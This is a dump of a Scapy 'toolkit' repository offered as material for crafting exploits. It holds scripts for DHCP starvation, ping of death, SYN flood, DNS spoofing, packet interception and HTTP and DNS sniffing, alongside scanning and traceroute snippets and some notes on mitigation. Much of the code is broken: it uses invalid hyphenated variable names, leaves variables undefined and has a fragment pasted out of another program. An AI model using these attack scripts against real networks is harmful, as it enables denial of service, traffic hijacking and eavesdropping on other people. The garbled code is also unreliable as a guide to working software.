├── DOS attacks ├── DHCP DOS │ ├── dhcp-dos.py │ └── presentation.txt~ ├── Ping Of Death │ └── ping-of-death.py └── SYN Flood │ └── syn-flood-attack.py ├── Data modification ├── intercept-modif-pkt.py └── presentation.txt~ ├── Host scanning ├── arpping.py ├── tcpping.py └── udpping.py ├── Port scanning └── port-scanning-techniques.txt ├── README.md ├── Sniffing ├── dhcp.py ├── dnssniff.py ├── httpsniff ├── sniff.py └── tcpsniff.py ├── Spoofing attacks └── DNS spoofing │ ├── dns-spoofing.py │ ├── presentation.txt │ └── presentation.txt~ └── traceroute ├── dnstraceroute.py ├── tcptraceroute.py └── udptraceroute.py /DOS attacks/DHCP DOS/dhcp-dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Change log level to suppress annoying IPv6 error 4 | import logging 5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 6 | 7 | #Import Scapi library 8 | from scapy.all import * 9 | 10 | 11 | def dhcpResponse(pkt): 12 | pkt.show() 13 | 14 | 15 | #ip-broadcast = raw_input('Please enter the Broadcasting IP address of the target network : ') 16 | 17 | ipbroadcast="10.10.47.255" 18 | 19 | filter = "udp and (port 67 or 68)" 20 | 21 | #Ethernet layer : 22 | ether = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff") 23 | #IP layer : 24 | ip = IP(src="0.0.0.0",dst=ipbroadcast) 25 | #UDP layer 26 | udp = UDP(sport=68,dport=67) 27 | #BOOTP layer 28 | bootp = BOOTP(chaddr=RandString(12,'0123456789abcdef')) 29 | #Application (DHCP) layer 30 | dhcp = DHCP(options=[("message-type","discover"),"end"]) 31 | 32 | # Create and forge the packet 33 | dhcp_discover = ether/ip/udp/bootp/dhcp 34 | 35 | dhcp_req = Ether(src=localm,dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=[mac2str(localm)],xid=localxid)/DHCP(options=[("message-type","request"),("server_id",sip),("requested_addr",myip),("hostname",myhostname),("param_req_list","pad"),"end"]) 36 | 37 | #Send the packet using send boucle until there is no dhcp response : 38 | send(dhcp_discover) 39 | 40 | # sniff DHCP responses : 41 | sniff(count=0, prn = dhcpResponse, filter=filter, lfilter=lambda(f):f.haslayer(DHCP)) 42 | 43 | 44 | #https://github.com/kamorin/DHCPig/blob/master/pig.py 45 | 46 | p_advertise="" 47 | 48 | iaid=0xf 49 | 50 | trid=None 51 | 52 | options=[23,24] 53 | 54 | trid=trid or random.randint(0x00,0xffffff) 55 | ethead=v6_build_ether(p_advertise[Ether].dst) 56 | srv_id=DHCP6OptServerId(duid=p_advertise[DHCP6OptServerId].duid) 57 | cli_id=p_advertise[DHCP6OptClientId] 58 | iana=DHCP6OptIA_NA(ianaopts=p_advertise[DHCP6OptIA_NA].ianaopts, iaid=iaid) 59 | dhcp_request=ethead/DHCP6_Request(trid=trid)/cli_id/srv_id/iana/DHCP6OptElapsedTime()/DHCP6OptOptReq( reqopts=options) 60 | 61 | 62 | 63 | SEQUENCE 64 | ----> DHCP_DISCOVER 65 | <---- DHCP_OFFER 66 | ----> DHCP_REQUEST 67 | <---- DHCP_REPLY (ACK/NACK) 68 | 69 | DHCPd snoop detection (DHCPd often checks if IP is in use) 70 | Check for ARP_Snoops 71 | Check for ICMP Snoops 72 | 73 | 74 | 75 | return dhcp_request -------------------------------------------------------------------------------- /DOS attacks/DHCP DOS/presentation.txt~: -------------------------------------------------------------------------------- 1 | DHCP Starvation Attack 2 | 3 | - How it works ? 4 | 5 | Explain the main objective of a DHCP server. 6 | 7 | DHCP Starvation consist on broadcasting vast numbers of DHCP dummy requests with random/spoofed MAC addresses to obfuscate the identity of the attacker simultaneously. After few second, and if enough requests flooded onto the network, there is no more IP addresses available in the pool, and as result, the DHCP server will not be able to send response to clients. 8 | 9 | - What this attack can be potentiel for ? 10 | 11 | Once the DHCP server is down, The network attacker can then set up a Rogue DHCP Server on the network and perform man in the middle attacks, or set their machine as the default gateway and sniff all network traffics. 12 | 13 | - How to perform this attack ? 14 | 15 | This type of attack can easily be achieved with Scapy : 16 | 17 | - How can I prevent this on my network ? 18 | 19 | Such attack are usually prevented on the switch ports. The idea is to limit the number of clients (identified my thier MAC addresses) behind a physical port. For example : 20 | 21 | Cisco IOS Mitigation : Cisco Catalyst switches can eradicate DHCP Starvation attacks using DHCP Snooping. To enable DHCP Snooping on a Cisco IOS switch, follow these steps: 22 | 23 | switch(config)# ip dhcp snooping 24 | !Enables DHCP Snooping globally! 25 | switch(config)# ip dhcp snooping vlan {,} 26 | !Enables DHCP Snooping for Specific VLANs! 27 | switch(config-if)# ip dhcp snooping trust 28 | !Sets the interface to trusted state; can then pass DHCP replies! 29 | switch(config-if)# ip dhcp snooping limit rate 30 | !Sets rate limit for DHCP Snooping! 31 | 32 | Cisco CatOS Mitigation : To mitigate DHCP Starvation attacks with port security on CatOS, use the following: 33 | 34 | set port security 5/1 enable 35 | set port security 5/1 port max 1 36 | set port security 5/1 violation restrict 37 | set port security 5/1 age 2 38 | set port security 5/1 timer-type inactivity 39 | -------------------------------------------------------------------------------- /DOS attacks/Ping Of Death/ping-of-death.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Change log level to suppress annoying IPv6 error 4 | import logging 5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 6 | 7 | #Import Scapi library 8 | from scapy.all import * 9 | 10 | ip-victime = raw_input('Please enter the IP address of the target (virtual machine) : ') 11 | 12 | #Then, we send a fragmented packet of over 65,535 bytes : 13 | send(fragment(IP(dst=dip)/ICMP()/('X'*60000)) -------------------------------------------------------------------------------- /DOS attacks/SYN Flood/syn-flood-attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Change log level to suppress annoying IPv6 error 4 | import logging 5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 6 | 7 | #Import Scapy library 8 | from scapy.all import * 9 | 10 | ip-victime = raw_input('Please enter the IP address of the target (virtual machine) : ') 11 | 12 | topt=[('Timestamp', (10,0))] 13 | ip = IP(dst=ip-victime, id=1111,ttl=99) 14 | #TCP flag is set to S value (SYN flag) 15 | tcp = TCP(sport=RandShort(),dport=[22,80],seq=12345,ack=1000,window=1000,flags="S",options=topt) 16 | #dummy data 17 | payload = "SYNFLOODATTACK" 18 | 19 | pkt = ip/tcp/payload 20 | 21 | #using a loop, we send out packets at 0.3 second intervals with a timeout of 4 seconds. 22 | 23 | ans,unans=srloop(p,inter=0.3,retry=2,timeout=4) 24 | 25 | 26 | -------------------------------------------------------------------------------- /Data modification/intercept-modif-pkt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Change log level to suppress annoying IPv6 error 4 | import logging 5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 6 | 7 | #Import Scapy library 8 | from scapy.all import * 9 | 10 | def callback(pkt): 11 | if pkt.haslayer(DNS): 12 | pkt[DNS].dport = 10000 13 | send(pkt) 14 | 15 | sniff(filter="host 192.168.0.5", prn=callback, store=0, iface="wlan0") -------------------------------------------------------------------------------- /Data modification/presentation.txt~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TmmmmmR/scapy-toolkit/c90cc0ea9a584041abf1cc3256891cce51b716ba/Data modification/presentation.txt~ -------------------------------------------------------------------------------- /Host scanning/arpping.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # arping2tex : arpings a network and outputs a LaTeX table as a result 3 | 4 | import sys 5 | if len(sys.argv) != 2: 6 | print "Usage: arping2tex \n eg: arping 192.168.1.0/24" 7 | sys.exit(1) 8 | 9 | from scapy.all import srp,Ether,ARP,conf 10 | conf.verb=0 11 | ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]),timeout=2) 12 | 13 | print r"\begin{tabular}{|l|l|}" 14 | print r"\hline" 15 | print r"MAC & IP\\" 16 | print r"\hline" 17 | for snd,rcv in ans: 18 | print rcv.sprintf(r"%Ether.src% & %ARP.psrc%\\") 19 | print r"\hline" 20 | print r"\end{tabular}" -------------------------------------------------------------------------------- /Host scanning/tcpping.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from prettytable import * 3 | 4 | # Define end host and TCP port range 5 | target = "google.com" 6 | portRange = [21,22,23,25,80,110,443,513,3389,6000] 7 | results = PrettyTable(["Host", "Port", "State"]) 8 | 9 | # Send TCP packets with SYnN flag 10 | for dstPort in portRange: 11 | 12 | resp = sr1(IP(dst=target)/TCP(dport=[21,22,23,25,80,110,443,513,3389,6000],flags="S")) 13 | 14 | if (resp.haslayer(TCP)): 15 | if(resp.getlayer(TCP).flags == 0x12): 16 | results.add_row([resp[IP].src, dstPort, "open"]) 17 | #print host + ":" + str(dstPort) + " is open." 18 | elif (resp.getlayer(TCP).flags == 0x14): 19 | results.add_row([resp[IP].src, dstPort, "closed"]) 20 | 21 | print results 22 | #>>> ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=[21,22,23,25,80,110,443,513,3389,6000],flags="S") ) 23 | #>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") ) 24 | -------------------------------------------------------------------------------- /Host scanning/udpping.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | ans,unans=sr( IP(dst="192.168.*.1-10")/UDP(dport=0) ) 4 | ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") ) 5 | -------------------------------------------------------------------------------- /Port scanning/port-scanning-techniques.txt: -------------------------------------------------------------------------------- 1 | #ACK scan : 2 | ans,unans = sr(IP(dst="www.slashdot.org")/TCP(dport=[80,666],flags="A")) 3 | 4 | for s,r in ans: 5 | if s[TCP].dport == r[TCP].sport: 6 | print str(s[TCP].dport) + " is unfiltered" 7 | 8 | for s in unans: 9 | print str(s[TCP].dport) + " is filtered" 10 | 11 | 12 | #TCP XMAS SCAN : 13 | ans,unans = sr(IP(dst="192.168.1.1")/TCP(dport=666,flags="FPU") ) 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # scapy-toolkit 2 | Some code snapshots to craft your own tool/exploit ! 3 | -------------------------------------------------------------------------------- /Sniffing/dhcp.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | #get hardware information of our pentest machine 4 | fam, hw = get_if_raw_hwaddr(conf.iface) 5 | 6 | # Define a callback function for when DHCP packets are received 7 | def dhcp_print(resp): 8 | print "DHCP offer from : " +resp[Ether].src 9 | print "To : " +resp[Ether].src 10 | 11 | #Display DHCP options : 12 | 13 | for opt in resp[DHCP].options: 14 | if opt == 'end': # This option indicate the end of a DHCP options area in DHCP message packets 15 | break 16 | elif opt == 'pad': #This option is used as byte padding to cause subsequent option records to align on a word boundary. 17 | break 18 | print opt # DHCP option 19 | 20 | 21 | # Forge our DHCP request 22 | ether = Ether(dst='ff:ff:ff:ff:ff:ff') 23 | ip = IP(src='0.0.0.0', dst='255.255.255.255') 24 | udp = UDP(sport=68, dport=67) 25 | bootp = BOOTP(chaddr=hw) 26 | dhcp = DHCP(options=[("message-type","discover")]) 27 | 28 | dhcp_request = ether/ip/udp/bootp/dhcp 29 | 30 | # Send the DHCP request 31 | sendp(dhcp_request) 32 | 33 | # Set a filter and sniff for any DHCP packets 34 | sniff(prn=dhcp_print, filter='udp and (port 67 or 68)', store=1) -------------------------------------------------------------------------------- /Sniffing/dnssniff.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from prettytable import * 3 | 4 | 5 | def dns_print(pkt): 6 | if pkt.haslayer(DNSQR): # DNS question record 7 | global results 8 | results.add_row([pkt[DNS].qd.qname, pkt[IP].src, pkt[IP].dst]) 9 | 10 | results = PrettyTable(["DNS query", "Source", "Destination"]) 11 | sniff(filter='udp port 53', iface='wlan0', count=20, prn=dns_print) 12 | print results 13 | 14 | -------------------------------------------------------------------------------- /Sniffing/httpsniff: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from scapy.all import * 4 | from scapy.error import Scapy_Exception 5 | 6 | filter_message="tcp" 7 | count=0 8 | 9 | def pktTCP(pkt): 10 | global count 11 | if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.haslayer(Raw): 12 | count=count+1 13 | print pkt.getlayer(Raw).load 14 | 15 | sniff(prn=pktTCP,filter="tcp") -------------------------------------------------------------------------------- /Sniffing/sniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Change log level to suppress annoying IPv6 error 4 | import logging 5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 6 | 7 | #Import Scapi library 8 | from scapy.all import * 9 | 10 | filter = "port 53" 11 | 12 | from scapy.all import * 13 | def callback(pkt): 14 | if pkt.haslayer(TCP): 15 | # nsummary function ... 16 | print pkt.nsummary() 17 | # show funtion ... 18 | print pkt.show() 19 | # equivalent to print pkt.getlayer(TCP) 20 | print pkt[TCP] 21 | # 22 | 23 | sniff(filter=filter, lfilter=lambda(f):f.haslayer(DNS), prn=callback, store=0, iface="wlan0") -------------------------------------------------------------------------------- /Sniffing/tcpsniff.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from prettytable import * 3 | 4 | def dhcp(p): 5 | p.sprintf("%TCP.flags%") 6 | 7 | pkts = sniff(filter="tcp",count=3,prn=dhcp) 8 | pkts.nsummary(lfilter = lambda (r): r.sprintf("%TCP.flags%") == "A") 9 | 10 | -------------------------------------------------------------------------------- /Spoofing attacks/DNS spoofing/dns-spoofing.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Change log level to suppress annoying IPv6 error 4 | import logging 5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 6 | 7 | #Import Scapi library 8 | from scapy.all import * 9 | 10 | dns-server-ip-address = raw_input('Please enter the IP address of the DNS server :') 11 | 12 | local-ip-address = raw_input('Please enter the local IP address :') 13 | 14 | filter = "udp port 53 and ip dst " + dns-server-ip 15 | 16 | def dns_spoof(pkt): 17 | 18 | if (pkt[DNS].opcode == 0L and pkt[DNS].ancount == 0 and pkt[IP].src != localIP): 19 | # the IP dest is the DNS server and the src is the client how made a DNS query to get the IP address of www.foo.com 20 | ip = IP(dst=pkt[IP].src, src=pkt[IP].dst) 21 | udp = UDP(dport=pkt[UDP].sport, sport=53) 22 | dns = DNS(id=pkt[DNS].id, aa = 1, qr=1, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qd.qname, ttl=10, rdata=local-ip-address)) 23 | 24 | spoofedResp = ip/udp/dns 25 | 26 | send(spoofedResp) 27 | 28 | print "Spoofed DNS response sent !" 29 | 30 | sniff(iface="wlan0", store=0, prn=dns_spoof, filter=filter, lfilter=filter, lambda(f):f.haslayer(DNSQR)) -------------------------------------------------------------------------------- /Spoofing attacks/DNS spoofing/presentation.txt: -------------------------------------------------------------------------------- 1 | Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed— identity spoofing. An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet. 2 | 3 | After gaining access to the network with a valid IP address, the attacker can modify, reroute, or delete your data. The attacker can also conduct other types of attacks, as described in the following sections. 4 | ####################################################################################################################################### 5 | IP Address Spoofing Attacks 6 | 7 | IP address spoofing is one of the most frequently used spoofing attack methods. In an IP address spoofing attack, an attacker sends IP packets from a false (or “spoofed”) source address in order to disguise itself. Denial-of-service attacks often use IP spoofing to overload networks and devices with packets that appear to be from legitimate source IP addresses. 8 | 9 | There are two ways that IP spoofing attacks can be used to overload targets with traffic. One method is to simply flood a selected target with packets from multiple spoofed addresses. This method works by directly sending a victim more data than it can handle. The other method is to spoof the target’s IP address and send packets from that address to many different recipients on the network. When another machine receives a packet, it will automatically transmit a packet to the sender in response. Since the spoofed packets appear to be sent from the target’s IP address, all responses to the spoofed packets will be sent to (and flood) the target’s IP address. 10 | 11 | IP spoofing attacks can also be used to bypass IP address-based authentication. This process can be very difficult and is primarily used when trust relationships are in place between machines on a network and internal systems. Trust relationships use IP addresses (rather than user logins) to verify machines’ identities when attempting to access systems. This enables malicious parties to use spoofing attacks to impersonate machines with access permissions and bypass trust-based network security measures. 12 | 13 | How it works ? 14 | 15 | How we can do this using Scapy ? 16 | 17 | 18 | ####################################################################################################################################### 19 | DNS Server Spoofing Attacks 20 | 21 | The Domain Name System (DNS) is a system that associates domain names with IP addresses. Devices that connect to the internet or other private networks rely on the DNS for resolving URLs, email addresses, and other human-readable domain names into their corresponding IP addresses. In a DNS server spoofing attack, a malicious party modifies the DNS server in order to reroute a specific domain name to a different IP address. In many cases, the new IP address will be for a server that is actually controlled by the attacker and contains files infected with malware. DNS server spoofing attacks are often used to spread computer worms and viruses. 22 | 23 | How it works ? 24 | 25 | How we can do this using Scapy ? 26 | 27 | 1. Sniff with Scapy to listen for incoming DNS requests Filtering for UDP port 53 destined to the server’s IP address 28 | 2. If the request is for our special domain name, send a spoofed DNS response 29 | 30 | Swap source/dest UDP ports and IP addresses 31 | Match DNS request ID 32 | 33 | 34 | ####################################################################################################################################### 35 | ARP Spoofing Attack : 36 | 37 | ARP is short for Address Resolution Protocol, a protocol that is used to resolve IP addresses to MAC (Media Access Control) addresses for transmitting data. In an ARP spoofing attack, a malicious party sends spoofed ARP messages across a Local Area Network in order to link the attacker’s MAC address with the IP address of a legitimate member of the network. This type of spoofing attack results in data that is intended for the host’s IP address getting sent to the attacker instead. Malicious parties commonly use ARP spoofing to steal information, modify data in-transit, or stop traffic on a LAN. ARP spoofing attacks can also be used to facilitate other types of attacks, including denial-of-service, session hijacking, and man-in-the-middle attacks. ARP spoofing only works on Local Area Networks that use the Address Resolution Protocol. 38 | 39 | How it works ? 40 | 41 | How we can do this using Scapy ? 42 | 43 | ####################################################################################################################################### 44 | Spoofing Attack Prevention and Mitigation ? 45 | 46 | There are many tools and practices that organizations can employ to reduce the threat of spoofing attacks. Common measures that organizations can take for spoofing attack prevention include: 47 | 48 | Packet filtering: Packet filters inspect packets as they are transmitted across a network. Packet filters are useful in IP address spoofing attack prevention because they are capable of filtering out and blocking packets with conflicting source address information (packets from outside the network that show source addresses from inside the network and vice-versa). 49 | 50 | Avoid trust relationships: Organizations should develop protocols that rely on trust relationships as little as possible. It is significantly easier for attackers to run spoofing attacks when trust relationships are in place because trust relationships only use IP addresses for authentication. 51 | 52 | Use spoofing detection software: There are many programs available that help organizations detect spoofing attacks, particularly ARP spoofing. These programs work by inspecting and certifying data before it is transmitted and blocking data that appears to be spoofed. 53 | 54 | Use cryptographic network protocols: Transport Layer Security (TLS), Secure Shell (SSH), HTTP Secure (HTTPS), and other secure communications protocols bolster spoofing attack prevention efforts by encrypting data before it is sent and authenticating data as it is received. 55 | -------------------------------------------------------------------------------- /Spoofing attacks/DNS spoofing/presentation.txt~: -------------------------------------------------------------------------------- 1 | Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed— identity spoofing. An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet. 2 | 3 | After gaining access to the network with a valid IP address, the attacker can modify, reroute, or delete your data. The attacker can also conduct other types of attacks, as described in the following sections. 4 | -------------------------------------------------------------------------------- /traceroute/dnstraceroute.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | dst = "example.com" 4 | ans,unans=traceroute("4.2.2.1",l4=UDP(sport=RandShort())/DNS(qd=DNSQR(qname=dst))) 5 | -------------------------------------------------------------------------------- /traceroute/tcptraceroute.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | dst_ip="8.8.8.8" 4 | 5 | ans,unans=sr(IP(dst=dst_ip,ttl=(1,10))/TCP(dport=53,flags="S")) 6 | ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}")) 7 | -------------------------------------------------------------------------------- /traceroute/udptraceroute.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | #dst_ip="8.8.8.8" 4 | #res,unans = sr(IP(dst=dst_ip, ttl=(1,20))/UDP()/DNS(qd=DNSQR(qname="test.com")) 5 | 6 | from scapy.all import * 7 | hostname = "8.8.8.8" 8 | for i in range(1, 28): 9 | pkt = IP(dst=hostname, ttl=i) / UDP(dport=33434) 10 | # Send the packet and get a reply 11 | reply = sr1(pkt, verbose=0) 12 | if reply is None: 13 | # No reply =( 14 | break 15 | elif reply.type == 3: 16 | # We've reached our destination 17 | print "Done!", reply.src 18 | break 19 | else: 20 | # We're in the middle somewhere 21 | print "%d hops away: " % i , reply.src 22 | --------------------------------------------------------------------------------